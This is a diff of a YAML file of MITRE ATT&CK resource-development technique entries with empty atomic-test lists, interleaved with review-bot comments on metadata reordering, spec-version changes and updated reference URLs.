@@ -52610,42 +53283,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
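Review bot: T1588.001 (Malware) loses `x_mitre_attack_spec_version: 2.1.0` at the top of this hunk with no replacement visible, while T1583.003, whose block is deleted in the rest of the hunk, is re-emitted below with `x_mitre_attack_spec_version: 3.2.0`. Confirm the Malware object gets the key back elsewhere (no hunk for that object shows it) rather than silently losing it. The T1583.003 delete-and-re-add is otherwise pure key reordering that hides the real changes; have the generator emit keys in a fixed order so future regenerations diff cleanly.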
@@ -52654,22 +53295,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
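Review bot: three real changes to T1583.003 are buried in the reordered block and should be called out in the PR description: `revoked: false` and `x_mitre_deprecated: false` are new keys, and `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0 while `x_mitre_version: '1.1'` is unchanged (consistent, since the former tracks the ATT&CK data spec and the latter the technique content). The `external_references` list also changes order (Koczwara, Trendmicro, Mandiant, ThreatConnect instead of Trendmicro, ThreatConnect, Mandiant, Koczwara) with no change to the entries themselves.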
@@ -52683,7 +53355,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -52770,11 +53442,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -52834,7 +53505,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -52876,7 +53546,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -52891,7 +53561,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -52982,11 +53651,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -53019,15 +53687,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
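Review bot: once the reflow is discounted, the only textual change to the T1608.005 description is the parenthetical `(including one-time, single use links)`, mirroring the `(including one-time, single use domain names)` wording added to T1583.001 above. No `x_mitre_version` change is visible in this hunk, whereas T1583.001's parallel edit came with a 1.3 to 1.4 bump, so confirm the upstream bundle versioned this technique as well.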
@@ -53111,7 +53780,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -53165,7 +53833,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -53216,36 +53883,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -53254,21 +53895,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
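Review bot: the `Recorded Future Beacon 2019` reference changes silently inside the reorder: the URL moves from https://www.recordedfuture.com/identifying-cobalt-strike-servers/ (deleted in the previous hunk) to https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers, and the retrieval date from October 16, 2020 to September 16, 2024. That is a source-data correction, not a reorder, and belongs in the PR description, as do `revoked: false`, `x_mitre_deprecated: false` and the 2.1.0 to 3.2.0 `x_mitre_attack_spec_version` bump for this object.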
@@ -53314,17 +53981,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -53350,7 +54016,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -53382,8 +54048,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
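Review bot: this hunk deletes `x_mitre_attack_spec_version: 2.1.0` from T1585.001 together with `spec_version` and adds nothing back, and the same two-line deletion appears for T1587.004 and T1608.003 below. For T1583.003, T1588.002 and T1588 the regenerated blocks carry `x_mitre_attack_spec_version: 3.2.0`, so either these three objects get the key re-emitted elsewhere in their block (outside the three lines of context shown) or they end up with no spec version at all; please verify the regenerated YAML for those objects before merging.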
@@ -53410,7 +54074,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53434,8 +54098,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -53461,7 +54123,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -53495,8 +54157,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -53544,7 +54204,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -53560,7 +54220,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -53619,54 +54278,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -53677,22 +54292,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
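Review bot: the regenerated `external_references` for T1588 fixes the inconsistent per-entry key order of the old block (the deleted `PegasusCitizenLab` entry began with `url:` and ended with `source_name:`, and `DiginotarCompromise` began with `description:`), which is a welcome normalisation, but the list order is neither the old order nor alphabetical, so it will churn again on the next regeneration unless the generator sorts it. The `Recorded Future Beacon Certificates` URL also changes, from https://www.recordedfuture.com/cobalt-strike-servers/ to https://www.recordedfuture.com/research/cobalt-strike-servers with retrieval date September 16, 2024, which is a content change worth listing in the PR description; `x_mitre_is_subtechnique: false` merely moves up within the object.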
@@ -53755,37 +54414,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
